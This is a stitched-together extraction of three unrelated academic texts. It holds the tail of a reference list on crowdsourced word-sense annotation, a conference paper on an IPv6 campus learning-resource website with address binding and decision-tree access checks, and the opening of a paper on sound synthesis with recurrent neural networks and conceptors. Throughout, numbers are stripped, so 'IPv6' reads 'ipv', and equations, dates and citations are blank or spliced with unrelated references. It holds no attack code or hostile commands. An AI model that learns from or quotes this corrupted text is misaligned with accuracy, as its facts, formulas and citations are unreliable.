ual sense-tagging. computers and the humanities, ( - ): – . girish kulkarni, visruth premraj, vicente ordonez, sag- nik dhar, siming li, yejin choi, alexander c. berg, and tamara l. berg. . babytalk: understand- ing and generating simple image descriptions. ieee transactions on pattern analysis and machine intelli- gence, ( ): – . yen-ling kuo, jong-chuan lee, kai-yang chiang, rex wang, edward shen, cheng-wei chan, and jane yung-jen hsu. . community-based game de- sign: experiments on social games for commonsense data collection. in proceedings of the acm sigkdd workshop on human computation, pages – . mathieu lafourcade and alain joubert. . comput- ing trees of named word usages from a crowdsourced lexical network. in proceedings of the international multiconference on computer science and informa- tion technology (imcsit), pages – , wisla, poland. tak yeon lee, casey dugan, werner geyer, tristan ratchford, jamie rasmussen, n. sadat shami, and stela lupushor. . experiments on motivational feedback for crowdsourced workers. in seventh in- ternational aaai conference on weblogs and social media (icwsm), pages – . thomas mensink, jakob j. verbeek, and gabriela csurka. . tree-structured crf models for inter- active image labeling. ieee transactions on pattern analysis and machine intelligence, ( ): – . george a. miller, claudia leacock, randee tengi, and ross bunker. . a semantic concordance. in pro- ceedings of the rd darpa workshop on human lan- guage technology, pages – , plainsboro, n.j. roberto navigli and simone paolo ponzetto. . ba- belnet: the automatic construction, evaluation and application of a wide-coverage multilingual semantic network. artificial intelligence, : – . roberto navigli. . word sense disambiguation: a survey. acm computing surveys (csur), ( ): – . martha palmer, hoa dang, and christiane fellbaum. . making fine-grained and coarse-grained sense distinctions, both manually and automatically. natu- ral language engineering, ( ): – . rebecca j. passonneau and bob carpenter. . the benefits of a model of annotation. in th linguistic annotation workshop and interoperability with dis- course, august – . rebecca j. passonneau, vikas bhardwaj, ansaf salleb- aouissi, and nancy ide. . multiplicity and word sense: evaluating and learning from multiply labeled word sense annotations. language resources and evaluation, ( ): – . ei pa pa pe-than, dh-l goh, and chei sian lee. . a survey and typology of human computation games. in information technology: new generations (itng), ninth international conference on, pages – . ieee. mohammad taher pilehvar and roberto navigli. . a large-scale pseudoword-based evaluation frame- work for state-of-the-art word sense disambigua- tion. computational linguistics, ( ). massimo poesio, jon chamberlain, udo kruschwitz, livio robaldo, and luca ducceschi. . phrase de- tectives: utilizing collective intelligence for internet- scale language resource creation. acm transac- tions on interactive intelligent systems, ( ): : – : , april. nitin seemakurty, jonathan chu, luis von ahn, and an- thony tomasic. . word sense disambiguation via human computation. in proceedings of the acm sigkdd workshop on human computation, pages – . acm. rion snow, brendan o’connor, daniel jurafsky, and andrew ng. . cheap and fast – but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, waikiki, honolulu, hawaii, - october, pages – . antonio torralba, robert fergus, and william t free- man. . million tiny images: a large data set for nonparametric object and scene recognition. ieee transactions on pattern analysis and machine intelli- gence, ( ): – . daniele vannella, david jurgens, daniele scarfini, domenico toscani, and roberto navigli. . vali- dating and extending semantic knowledge bases using video games with a purpose. in proceedings of the nd annual meeting of the association for computa- tional linguistics (acl), pages – . noortje j. venhuizen, valerio basile, kilian evang, and johan bos. . gamification for word sense label- ing. in proceedings of the international conference on computational semantics (iwcs), pages – . luis von ahn and laura dabbish. . labeling im- ages with a computer game. in proceedings of the conference on human factors in computing systems (chi), pages – . luis von ahn and laura dabbish. . designing games with a purpose. communications of the acm, ( ): – . aobo wang, cong duy vu hoang, and min-yen kan. . perspectives on crowdsourcing annotations for natural language processing. language resources and evaluation, ( ): – . paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) design of university resource website and security measures in ipv chunmei li department of computer technology and application, qinghai university xining, china e-mail: chunmeili@xyz.com peng cui department of computer technology and application, qinghai university xining, china e-mail: pengcu@xyz.com xinke zhou department of computer technology and application, qinghai university xining, china e-mail: xinkezhou@xyz.com ze xiao department of computer technology and application, qinghai university xining, china e-mail: zexiao@xyz.com abstract—in this paper authors introduced the overall design of learning resource sharing platform in the pure ipv environment, including the client and the web server and the back-end database, and the user management, the detailed design of the three aspects of resource management platform and administrator management. finally authors introduced application of decision tree in this website. keywords-ipv ; address binding; decision tree i. introduction with the development of computer technology, people's work style, lifestyle changes, the increasing demand for computer networks, and the rapid increase in the number of internet users, making the urgent increase in ipv address requirements. the existing ipv address has long been unable to meet the demand. after the depletion of ipv address in asian, latin america, europe and the united states and other regions , on september , , north america also declared ipv address were exhausted, leaving only a small amount of the african region [ ]. in order to maintain the use of ipv addresses, there are technologies such as nat[ ] (network address translation) technology, vlsm (variable long subnet mask) technology[ ], cidr[ ] (no class interdomain routing) which can not solve the fundamental problem of ipv address depletion. so the technology translates from ipv to ipv and ipv environment in a variety of applications have been carried out in the world research, japan and other countries in the study of ipv new technology has been at the forefront of the world. ipv address is bits, which can represent the great address space, good scalability, better quality of service (qos), security、 mobility and improve the efficiency of routing and other characteristics [ ]. china has started the next generation of internet demonstration project (cngi) project in , one of the countries with relatively advanced global start and multiple ipv addresses, but the use of ipv addresses is far behind, the conversion of ipv and ipv uses three techniques, namely, dual-station protocol technology[ ], tunneling technology[ ][ ] and translation technology (also called protocol conversion technology)[ ]. at present, the most widely used technology is dual station technology. in this paper, ipv [ ][ ] itself is inherently safe, the address is unique, the address is wide and the transmission speed is fast. in the pure ipv environment, it is proposed to develop the campus learning resource sharing platform based on ipv , which can realize the upload of various learning resources download, in order to achieve the real learning resources to share, as a common progress, learn from each other, to discuss each other, so as to improve the quality of teaching, improve teaching effectiveness. ii. the overall design of learning resource sharing platform a. overall design the learning resource sharing platform is divided into two modules: client and server, as shown in figure . figure . overall design international conference on sensor network and computer engineering (icsnce ) the learning resource sharing platform[ ] is divided into two types of users: learners and administrators, learners upload and download and browse learning resources, communicating with each other through the message board; administrators of learning materials and message content audit, management[ ]. the general function of the system for the user is to upload learning materials and the corresponding description of the data, after the review by other users can download the use of the user after the use of the data can be evaluated, feedback to the platform of the message board. all users who have registered in this platform can upload and download student resources. before uploading, you need to verify the ipv address and user identity. the uploaded resources need to be audited before being downloaded. resources need to be feedback and evaluation after downloading resources. the development of the above platform is and the use of pure ipv environment is carried out. b. detailed design ) user management a) user registration and login users can register through the registration web page on the platform to become a user member of the platform. in this case, the user's ip address should be obtained and bound with its account. after success of the registration, the user can login through the login web page on the platform. after logging in, you can upload, download, play online and message and other operations. unregistered or unregistered users can browse the resources on this platform, but they can’t do the above operations. they can only use it before logging in. b) account management users can use the personal information web page to view the current user's registration information. in the meanwhile, we can update the user's property or modify the password through the web page. of course, for the user who forget the password, they can log in the web page to find the password to jump to modify the page to modify. when the login account is different form the last login ipv address, we can determine whether the new ipv the address is the same to the old. if it is, we allowed to continue to log in; if not in the same network account, prompts him to answer questions, the answer is correct, allowing it to continue to visit; otherwise, continue to answer questions, three times to prevent access to this law to prevent non-i upload illegal information, or to prevent non-i am injected into the illegal operation of virus files to protect the safety of users and resources. c. resource management the platform is a resource sharing platform which needs to cover all aspects of teaching resources. the platform in accordance with the discipline of resources classification, and real-time update resources. the main functions of it are: upload, download, online, message and so on. ) resource upload and download users can upload the various forms of resources, whose types are not limited. for example, you can upload word documents, ppt courseware, flash animation and video resources. the suffix of the resource can be. doc, .ppt, .zip, .rar, .swf and .tif and so on. only the resource information of the resource file is stored in the database. the website provides the resource download service according to the resource path. the uploaded resource file is usually stored in a subdirectory under the root directory of the website. users can only release resources after log in. users can fill out the information of the resource name, detailed information and other information. when users publish resources to determine whether the user's ipv address and the registration of the ipv address in the same network, if the same network, the user can upload data, if not in the same network, you need to answer specific questions to ensure the safety and reliability of users and resources. users can download the various forms of resources on the platform, each resource below the corresponding download. after the user clicks the download button, the download box will pop up, the path will be selected to click to start the download, and the user can select the default download path. after the completion of access to the appropriate path to view resources. ) resources online browsing users can browse some of the resources in the system, that is, you can browse the resources online without downloading. users simply click on the play button below the resource, you can browse online. for users who do not have the button to play, the user can only download and browse. ) message module the user can comment on a resource, they can also reply to the resources of other users to ask questions, in order to achieve the purpose of interactive learning; users can delete their own message, the administrator can delete the message, the message can not be edited. d. administrator management administrators can view, upload, download, delete resources, they can set the upload resource size limit, for the user to upload the resources for review, pending approval before the resource can be used. at the same time the administrator can also view, send and delete messages. of course, as with the user to upload resources, the administrator login after the implementation of administrative authority before the need for ipv authentication to determine the administrator's ipv address and the registration of the ipv address is the same network segment. if they are in same network segment, the management administrator can perform administrative privileges, and if it is no longer in the same network segment, the administrator needs to answer specific questions to perform administrative privileges. thus ensuring that the administrator himself is in operation to prevent others from maliciously executing administrator privileges. to ensure the safety of system operation. international conference on sensor network and computer engineering (icsnce ) iii. security measures for learning resource sharing platform of ipv a. the characteristics of ipv ensure the safety of network resources because ipv is just a simple network interworking protocol, a large number of security issues are not considered in, and ipv achieves ip-level security. ipsec is a series of security protocols that define the security services used at the internet layer. features of it includes data encryption, access control to network elements, data source address verification, data integrity checking, and replay prevention.ipv includes ipsec protocol, which can protect users from some network attacks[ ]. b. a huge resource of ipv addresses makes it possible to determine the one-to-one relationship between users and addresses since an ipv address is bits, theoretically there are ^ different ipv addresses. so basically it is guaranteed that everyone has a unique ipv address. this guarantees a true one-to-one correspondence between the user and the ip address. ipv does not support subnet masks. it only supports subnet prefix identification. the ipv prefix uses an address prefix similar to the cidr mechanism in ipv addresses. ipv uses address prefixes to identify networks, subnets, and routes. the ipv address is divided into two parts: the subnet prefix and the interface identifier [ ]. c. ipv address and user information binding one-to-one relationship between users and addresses ensure each user has a unique ipv address. this makes it possible to bind ip addresses to user information. the purpose of binding user information and user ip address is when you login next time, we can determine whether the same person in operation. if the user login address is same as the last ip address, then at least we can ensure the user or authorized others are operating. if it is not my own operations, then we can confirm whether it is himself by asking questions, if the answer is incorrect, only allow users to browse, but not allow other upload or download or leave a message and other operations. thus the system ensure the security of user information, but also protect the network resources and management of the security. d. application of decision tree algorithm in security assurance when the user register, we will get the user's ipv address and bind the user's information to their ipv address. when the user login again, we first determine whether the user's ipv address and the ipv address bound to it are in a campus network. if the user is in the same campus network, we use method . the user can directly upload data, download resources, learn online, message interaction and other operations. if not in the same campus network to determine whether in a city. if they are in a city, then we use the method , the user needs to enter the verification code, the verification code is correct, continue to use method .if they are not in a city , we determine whether it is the national address, if it is from other domestic cities ipv address, then we use the method , the user answered specific questions, if the problem is correct he can continue to access, we use method , or only have the right to browse or directly denied access to this site. this to ensure the safety of users, the safety of learning resources and management of the safety and reliability, this to ensure the safety of the entire learning resources platform. we analyzed ipv address in the experiment and divided into four categories in table below, and four kinds of ipv addresses for different treatment. in this process, if the ipv address is wrong ,the website will direct denial of access after prompt error. in general, there will not be wrong ipv address, ipv address in the ipv library are automatically obtained by the system. table i. four types ipv address whether campus website whether city website whether other chinese cities whether foreign website processing method yes no no no method no yes no no method no no yes no method no no no yes method therefore, we firstly classified ipv address based on the address of the library. of course, for each user ipv library, the ipv address is not the first time that the address of the application, but each time you use the address of these four categories ways to accumulate statistics, what kind of login the most frequently used, the data in the ipv library will be updated to the most frequently used ipv address. based on the classification process, the decision tree [ ] is used to make the classification decision. the decision tree is as follows: figure . processing decision tree iv. conclusion the resources provided by the website include images, text, video and other types, the content is not limited to the international conference on sensor network and computer engineering (icsnce ) school curriculum knowledge. rich and comprehensive learning resources for students to provide class and extracurricular learning opportunities. based on the realization of ipv makes the site security, user and resource security has greatly improved. the speed of access and download makes it unnecessary to wait for too long. the binding of ipv address and user information makes the user upload the resource reliability to ensure the security of the user, the security of the learning resource and the security of the management and reliability, thus ensuring the safety of the entire learning resource platform. the resources of the learning resource sharing platform and user and information reliability determine the utilization of the platform, is a major supplement to school teaching, improve the quality of teaching and teaching results. acknowledgment thanks for fund surpporting by the project :the next generation of internet innovation projects in the seir network, fund number: ng references [ ] zhu shuang. september north america ipv address exhausted [j]. china education network, ( ): - .j. clerk maxwell, a treatise on electricity and magnetism, rd ed., vol. . oxford: clarendon, , pp. – . [ ] sun zhongting. nat technology to solve the problem of ip address shortage [j] .computer and network . ( ): - . [ ] wang ning. vlsm technology in the application of ip address management [j]. computer cd-rom software and applications . . : - [ ] li ruijun.cidr-based network ip address planning and application [j]. journal of changchun normal university (natural science edition) . . . ( ): - . [ ] xia feng. research and implementation of key technology of distance education system based on ipv [j]. journal of xi'an jiaotong university, . [ ] guo-liang han, cong-xiao bao, xing li. a scalable and efficient ipv address integration approach in ipv transition scenarios [j]. frontiers of information technology & electronic engineering. august , volume , issue , pp - . [ ] wu zhaoxiong, liang xiongxiong.using the gre tunneling technology to access the meteorological local area network method [j] .guangdong meteorology . . . ( ): - . [ ] cheng si, cheng jia-xing. research on tunneling technology in vpn [j] .computer technology & development . . . ( ): - . [ ] gao zheng-ming, zhao yong, bao wei-hua. technology and realization of profibus dp / pa network protocol [j]. instrumentation standardization and metrology . . : : . [ ] li changhua, cui chenzhou, etc. ipv technology in astronomy research cloud computing environment application [j]. journal of computer applications. , (s ): - . [ ] ge jingguo, mi wei, wu yulei.ipv transition mechanism: research review, evaluation index and deployment considerations [j] .journal of software . : - . [ ] huang zhang-shu, li bao-yu, chen cui-ping. design of customer knowledge sharing resource library platform based on cloud computing [j]. modern information . . . ( ): - . [ ] zhang tao. ipv a number of security issues [d]. chinese academy of sciences graduate school (institute of software), . [ ] liu haifeng, wang lixin. implementation of ipv video on demand system based on think php framework [j]. journal of jilin institute of engineering technology, , ( ): - . [ ] qing hui. ipv -based multicast technology and application system research [d]. wuhan university of technology, . [ ] zhou dangdang, su yong. television ratings prediction research based on decision tree. submitted november accepted june published july corresponding author chris kiefer, c.kiefer@sussex.ac.uk academic editor dan stowell additional information and declarations can be found on page doi . /peerj-cs. copyright kiefer distributed under creative commons cc-by . open access sample-level sound synthesis with recurrent neural networks and conceptors chris kiefer experimental music technologies lab, department of music, university of sussex, brighton, united kingdom abstract conceptors are a recent development in the field of reservoir computing; they can be used to influence the dynamics of recurrent neural networks (rnns), enabling generation of arbitrary patterns based on training data. conceptors allow interpolation and extrapolation between patterns, and also provide a system of boolean logic for combining patterns together. generation and manipulation of arbitrary patterns using conceptors has significant potential as a sound synthesis method for applications in computer music but has yet to be explored. conceptors are untested with the generation of multi-timbre audio patterns, and little testing has been done on scalability to longer patterns required for audio. a novel method of sound synthesis based on conceptors is introduced. conceptular synthesis is based on granular synthesis; sets of conceptors are trained to recall varying patterns from a single rnn, then a runtime mechanism switches between them, generating short patterns which are recombined into a longer sound. the quality of sound resynthesis using this technique is experimentally evaluated. conceptor models are shown to resynthesise audio with a comparable quality to a close equivalent technique using echo state networks with stored patterns and output feedback. conceptor models are also shown to excel in their malleability and potential for creative sound manipulation, in comparison to echo state network models which tend to fail when the same manipulations are applied. examples are given demonstrating creative sonic possibilities, by exploiting conceptor pattern morphing, boolean conceptor logic and manipulation of rnn dynamics. limitations of conceptor models are revealed with regards to reproduction quality, and pragmatic limitations are also shown, where rises in computation and memory requirements preclude the use of these models for training with longer sound samples. the techniques presented here represent an initial exploration of the sound synthesis potential of conceptors, demonstrating possible creative applications in sound design; future possibilities and research questions are outlined. subjects artificial intelligence, multimedia keywords sound synthesis, machine learning, reservoir computing, conceptors, dynamical systems, echo state networks introduction machine learning and sound synthesis current intersections between sound synthesis and machine learning are evolving quickly. we have seen significant progress in symbolic note generation (e.g., rl tuner how to cite this article kiefer c. . sample-level sound synthesis with recurrent neural networks and conceptors. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:c.kiefer@sussex.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. (jaques et al., ), flow machines (ghedini, pachet & roy, )), parametric control of sound synthesis models (e.g wekinator (fiebrink, ), automatic vst programming (yee-king, fedden & d’inverno, )) and also with current state of the art raw audio generation techniques. these recent advances in raw audio synthesis principally use deep architectures, for example wavenet (oord et al., ), samplernn (mehri et al., ), nsynth (engel et al., ), gansynth (engel et al., ) and wavegan (donahue, mcauley & puckette, ), to generate low-level audio representations (sample or spectral level) without using a synthesis engine, working as self-contained models that merge sound generation and control into one. there is also significant interest from the computer music community in sound synthesis with dynamical and chaotic systems, with strong connections to rnn techniques being used in contemporary deep architectures. this goes back to the earlier work of composers such as roland kayn who composed with electronic cybernetic systems, and is reflected in more recent work from, for example, sanfilippo & valle ( ) on feedback systems, ianigro & bown ( ) on sound synthesis with continuous-time recurrent neural networks, wyse ( ) on sound synthesis with rnns and mudd ( ) on nonlinear dynamical processes in musical tools. the work presented here draws on overlapping research in both machine learning and dynamical systems techniques, in the context of sound synthesis. reservoir computing while many contemporary developments in machine learning and sound synthesis are based on deep neural network paradigms, pioneering work has also been taking place within the bio-inspired field of reservoir computing (rc) (schrauwen, verstraeten & van campenhout, ). within the rc paradigm, computation is performed using a structure that groups an untrained reservoir with a fixed input layer and a trainable output layer. the reservoir is a complex dynamical system which is perturbed by input signals and transforms these signals into a high-dimensional state space, the current state being dependent on both the current input and on a fading history of previous inputs. the output layer performs a linear transformation of the current reservoir state, and can be trained using supervised methods. rc systems can learn nonlinear and temporal mappings between the input and output signals. a reservoir can be created using both physical systems (e.g bacteria (jones et al., ), a bucket of water (fernando & sojakka, ) or optics (duport et al., )) and digital systems. the latter usually take the form of liquid-state machines (maass, natschläger & markram, ) or echo state networks (esns) (jaeger, ). echo state networks esns have so far been the primary technique employed for sound and music applications within the rc field. an esn (see fig. ) uses a randomly generated recurrent neural network (rnn) as a reservoir. this reservoir is connected to inputs and output via single layers of weights. the output layer weights can be trained using linear optimisation algorithms such as ridge regression (lukoševičius, , p. ). esns are inherently suited to audio applications due to their temporal dynamics. jaeger’s original work with esns included examples of models being trained to output kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure an example of an echo state network with ten sparsely connected nodes, single inputs and outputs, and fully connected input and output layers. full-size doi: . /peerjcs. /fig- discrete-periodic sequences and learning to behave as sine wave oscillators (jaeger, ). subsequently, esns have been applied to a range of creative sound and music tasks. these include symbolic sound generation tasks such as melody generation (jaeger & eck, ) and generative human-feel drumming (tidemann & demiris, ); direct audio manipulation and synthesis applications bear examples of amplifier modelling, audio prediction and polyphonic transcription (holzmann, b; holzmann, a; keuninckx, danckaert & van der sande, ); they have also been used for modelling complex mappings in interactive music systems (kiefer, ). under the classical esn approach, as applied to the task of sound synthesis, esns are trained as audio rate pattern generators. a limitation of the classical esn approach is that it is challenging to learn multiple attractors, corresponding to the generation of multiple patterns on different timescales with a single reservoir, although holzmann ( a) offered a solution by decoupling the reservoir with iir filter neurons. a recent development of the esn paradigm comes in the form of conceptors, an addition to the basic architecture of esns that enables the behaviour of the reservoir to be manipulated. conceptors conceptors (jaeger, a), offer a highly flexible method for generating and manipulating multiple patterns within single reservoirs. conceptors are a mechanism for performing a variety of neuro-computational functions, the ones most relevant to sound synthesis being incremental learning and generation of patterns, morphing and extrapolation of patterns, cued pattern recall, and the use of boolean logic to combine patterns (jaeger, a). they work by learning the subset of state space visited by an rnn when driven by a particular input. they can then be used to restrict the rnn to operate with this subspace, functioning like an attractor (gast et al., ). the separation of an rnn’s state space in this manner allows multiple attractors to be learned using the same network, and for combinations of these subspaces to be used to manipulate the dynamics and output of the rnn. the potential for combination of conceptors is a very powerful feature of this technique, and jaeger describes boolean logic rules for achieving this (jaeger, b p. ). their strong potential for pattern generation, extrapolation and manipulation, and the combination of continuous and discrete-boolean methods of manipulation are compelling kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. reasons to believe they will have strong applications in the field of audio and creative sound production. sound generation with conceptors has, however, yet to be explored. jaeger’s original work focuses on generation of short patterns of samples of less, where much longer patterns are required for sound generation. questions are unanswered concerning whether conceptors will (a) effectively generate longer patterns needed to synthesise audio signals at reasonable sample rates, (b) allow generation and combination of patterns with varied timbres within a single model and (c) produce signals effectively when evaluated with perceptually realistic audio comparison measurements. this paper approaches these questions through the application of conceptor models to a standard sound synthesis technique. it evaluates the effectiveness of conceptors at resynthesising sampled sound, and demonstrates conceptor-based sound synthesis techniques within a granular synthesis paradigm. new sound synthesis methods a new method of conceptor-based sound synthesis is demonstrated, named conceptular synthesis. this is a synthesis method based on granular synthesis. granular synthesis (roads, ) is based on the sequencing, combination and manipulation of short (typically ms– ms) windowed segments (grains) of sampled sound. it is a powerful technique for creating and coherently manipulating sound; applications include time and pitch independent stretching of pre-recorded audio. in conceptular synthesis, an rnn model is trained to generate grains, which are recalled by conceptors. the use of conceptor based rnn models allows flexible sound manipulation through creative combinations of conceptors to influence reservoir behaviour. this method is described below; to begin with, a mathematical description of the rnn and conceptor models is presented. basic models this section summarises the fundamental methods used in the creation of the sound synthesis models described below. for a more detailed explanation of these methods, please refer to jaeger’s extensive technical report on conceptors (jaeger, b). the notation used below will be used throughout the paper. matrices are represented by capital letters, vectors by lower-case letters, and scalar variables are shown using the greek alphabet. x(n) denotes the state of vector x at timestep n.m ′ denotes the transposition of matrix m. the basic model is an rnn consisting of ψ nodes, updated according to eqs. ( )–( ): z(n+ )=wx(n)+w ina(n+ ) ( ) at discrete time step n, activation levels for each rnn node are stored in state vector x of size ψ. the nodes are sparsely connected such that each node is connected, on average, to other nodes (as recommended in lukoševičius ( , section . . ). connection weight values are stored in weight matrix w (of size ψ x ψ). unconnected nodes share a weight value of . an input signal vector a (size ) is fully connected to the rnn nodes with the input weight matrix w in (size ψ x ). w in is generated using linear random values between −γ input and γ input . reservoir weight values are randomly chosen from a normal distribution, scaled according to the spectral radius γw (to limit the maximum kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. absolute eigenvalue), and then optimised during training. in eq. ( ), the activation levels for each node are stored in vector z; in eq. ( ) these activation values are passed through a nonlinearity, and smoothed using leaky integration. x(n+ )=( −α)x(n)+αtanh(z(n+ )+b) ( ) b is a vector of ψ biases, which are generated from a linear random distribution between −γbias and γbias. scaling in the above cases refers to a tensor being multiplied element-wise by a scalar value, x =xγ . the tanh smoothing function ensures that the reservoir states remain in the range − to , and introduces a nonlinearity into each node. α is a leaky integration coefficient (lukoševičius, , section . . ). this adds a one-pole lowpass filter to each node; lowering α (between and ) will slow down reservoir dynamics. this parameter can be fine-tuned to align the temporal dynamics of the reservoir to those of the desired output. y(n+ )=w out x(n+ ) ( ) output weights w out are a matrix of size x ψ, whose values are optimised during training. the output vector y is a vector of size . a model is trained in two phases: (a) audio signals aj are stored (jaeger, a) in the reservoir, so that they can later be reproduced, (b) a conceptor is calculated for each audio signal. following training, the model and conceptors are combined and manipulated to synthesise sound. storing patterns in the rnn and calculating output weights in this phase of training, a set of randomly generated reservoir weights w∗ are adapted so that the model can reproduce an array of driving audio signals aj, resulting in a new set of weights w . the number of elements in aj is determined by the sample slicing process detailed below. w∗ is optimised such that (a) wx(n)≈w∗x(n)+w ina(n), i.e., the reservoir can simulate the driving inputs in their absence, and (b) the magnitudes of weights w are minimised. the resulting weight matrix w is used in all further calculations. w in is no longer required after this step. training starts with a washout phase of length λ where the reservoir dynamics are allowed to settle, reducing influence from any transients that might result from the initial randomised state and that may adversely affect training. the model is subsequently driven by an input for length φ. the size of φ is task dependent, but should by large enough to collect the reservoir states that are likely to occur when perturbed by the input sequence. φ is calculated as an integer multiple of the length of training signal aj. the training process works as follows: for each pattern aj, the reservoir with weights w∗ is driven from an initial randomised state for λ+φ steps using eqs. ( ) and ( ), and the resultant reservoir states are collected. beginning at timestep , the states x from timesteps λ− ...λ+φ− are stored in ψ x φ matrix, x̃ j; states x from timesteps λ...λ+φ− are stored in ψ x φ matrix, x j; states z from timesteps λ...λ+φ− are stored in ψ x φ matrix, m j. the remaining states from the washout phase are discarded. the driving signals aj from timesteps λ...λ+φ− are stored in x φ matrices pj. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. these collections are concatenated into matrices x̃ =[x̃ |x̃ |...x̃n], x =[x |x |...xn], m =[m |m |...mn] and p =[p |p |...pn] w and w out can now be calculated using linear regression. the regression could be solved using a number of techniques; in this case, following jaeger’s initial work on conceptors (jaeger, b), ridge regression is used: w =((x̃x̃ ′+ρw iψxψ) − x̃m ′)′ ( ) w out =((xx ′+ρout iψxψ) − xp′)′ ( ) in both of the above, i is an identity matrix and ρw and ρout are regularisation factors. calculating conceptors conceptors can take several forms, the form used in this study is the alloconceptor (jaeger, , p ), a matrix conceptor that is calculated after patterns are stored in the network, and inserted into the update loop of the network at runtime. to calculate a conceptor which will influence the rnn to reproduce audio signal aj, the reservoir state correlation matrix r is initially calculated: r= x j(x j)′ φ ( ) the singular value decomposition (svd) of r is found u jsj(u j)′=rj ( ) sj is modified as follows, and used to calculate the conceptor cj: snew =sj(sj+β− iψxψ) − ( ) cj =u jsnew(u j)′ ( ) β is the aperture of the conceptor (jaeger, b, p ). the aperture is a scaling factor for the amount of energy that is allowed to pass when the conceptor filters the reservoir state in eq. ( ). the optimal value for β can be found programatically (see below). the new conceptor can now be inserted to the runtime loop of the rnn, as follows: z(n+ )=wx(n) ( ) this is a modification of eq. ( ), with the audio signal input removed, as it is no longer needed. z(n+ ) is then passed through the leaky integration filter from eq. ( ), and result is multiplied by the conceptor, as follows: x∗(n+ )=( −α)x(n)+αtanh(z(n+ )+b) ( ) x(n+ )=cjx∗(n+ ) ( ) following this step, eq. ( ) is used to calculate the output signal. kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. an optimal value for β can be found by observing the attenuation ac,β, which is the level of reservoir signal energy suppressed by the conceptor when the network is updated using eqs. ( ) and ( ) (jaeger, b, p ). attenuation can be calculated as follows: ac,β = e[||z(n)−x(n)|| ] e[||z(n)|| ] ( ) the optimal value for β corresponds to the minimum value of attenuation, calculated by collecting states from the model using conceptors calculated with varying values of β. the result of this training process is an rnn coupled with a set of conceptors; this model is referred to as a conceptor-controlled recurrent neural network (ccrnn). these basic methods are used in the experiments below, and expanded on with new techniques that allow training and exploitation of the models for sounds synthesis. method and materials this project asks how the pattern generation ability of ccrnns can be applied to the field of sound synthesis. it aims to establish and evaluate the fundamental capabilities of ccrnns to be trained to reproduce arbitrary audio signals, and to explore their creative affordances. the next section evaluates the potential of ccrrns to resynthesise sampled sounds. the ability of trained models to resynthesise the training signal is used as a measure of basic success in sound synthesis. resynthesis ability is the core indication of sound synthesis quality, although this evaluation only tells part of the story, as the techniques outlined in this project are intended for open-ended use in creative sound synthesis applications. to this end, the project maps out key methods for parameterising and manipulating ccrnn sound synthesis models to create new sonic variations of the original training material, establishing the technical strengths and limitations of ccrnn sound synthesis, and identify open questions for future research in this area. there is some discussion of processing time to indicate the scale of computation involved with these techniques. the conceptular synthesis experiment was run on a machine with . ghz i cpu and an nvidia gtx ti gpu using tensorflow. python source code in jupyter notebooks for all experiments is provided at https://github.com/chriskiefer/conceptorsoundsynthesis. source code for a working implementation of conceptular synthesis in the form of a drum synthesiser can be found at https://github.com/chriskiefer/conceptularbeatsynth. error and similarity metrics the experiments in this project focus on the quality of audio signals resynthesised with trained models in comparison to the original training material. in wider literature in reservoir computing, normalised root-mean-square error [ p ] (nrmse) is commonly used to measure similarity between signals. nrmse does not reflect perceptual aspects of sound similarity; these are crucial to understanding the results therefore a different metric is required. mel-frequency cepstral coefficients (mfccs) have been shown to be a robust measure of timbral similarity (jensen et al., ), and a good model of perceptual timbre kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/chriskiefer/conceptorsoundsynthesis https://github.com/chriskiefer/conceptularbeatsynth http://dx.doi.org/ . /peerj-cs. space (pampalk, dixon & widmer, ). they are widely used for music information retrieval tasks (hamel & eck, ) across a variety of use cases (e.g., (yee-king, fedden & d’inverno, ; khunarsal, lursinsap & raicharoen, ). for the purpose of audio signal comparison, mfccs were calculated from a point windowed fft. the sounds being analysed were short (typically between and samples); in order to capture the detail of the timbral envelope at all stages, a short sample hop-size was used. the fft results from each window were used to calculate mfccs. the first mfcc coefficient from each window was discarded as it does not give information about timbre (jensen et al., ). the remaining coefficients from each window were appended to create a single feature vector. the feature vectors from two sounds were compared using nrmse to arrive at an error value that reflects the similarity between the two sounds. this will be referred to as the mfcc error, with lower values indicating higher similarity. where relevant, waveforms and spectrograms are displayed for visual comparison, and audio is included in the dataset accompanying this paper. conceptular synthesis conceptular synthesis is a new sound synthesis method based on ccrnns, and expanding on an established method of sound synthesis, granular synthesis. in granular synthesis, sound is broken into small parts (grains), which are recombined in varying ways to produce new sounds. the theoretical roots of this method lie in gabor’s ( ) theory of acoustic quanta, and in the compositional theory of xenakis ( ). digital implementations of the technique were developed by roads ( ) and truax ( ). granular synthesis offers methods for further sound manipulation techniques including timestretching (truax, ) and corpus-based concatenative synthesis (schwarz, ). jaeger’s demonstration of the ability of ccrnns to be trained to generate arbitrary sequences suggests that they could become powerful sound synthesis tools, as they can theoretically reproduce arbitrary audio waveforms. however they are pragmatically limited to playing relatively short sequences; the reason for this is that the computational complexity of the model increases with ψ, and the desired size of ψ increases with the length of training sequences. however, if a model is trained to reproduce a set of shorter sound sequences, then granular synthesis techniques can be used to recombine these sequences to produce longer sounds. conceptular synthesis therefore expands upon granular synthesis, by dynamically generating grains using conceptors rather than replaying grains from sound sample data. grain patterns are stored in an rnn, and conceptors force the rnn to replay specific grains. a granular synthesis-style control mechanism is used to switch conceptors so that the model generates a sequence of short signals, which are combined into a longer waveform. the use of dynamic models instead of static sample data broadens the sonic potential of conceptular synthesis in comparison to classical granular synthesis, as the models provide further possibilities for creative manipulation. this section begins by describing conceptular synthesis techniques in detail, illustrated by an example demonstrating resynthesis of a kick drum sample. resynthesis quality is kiefer ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com 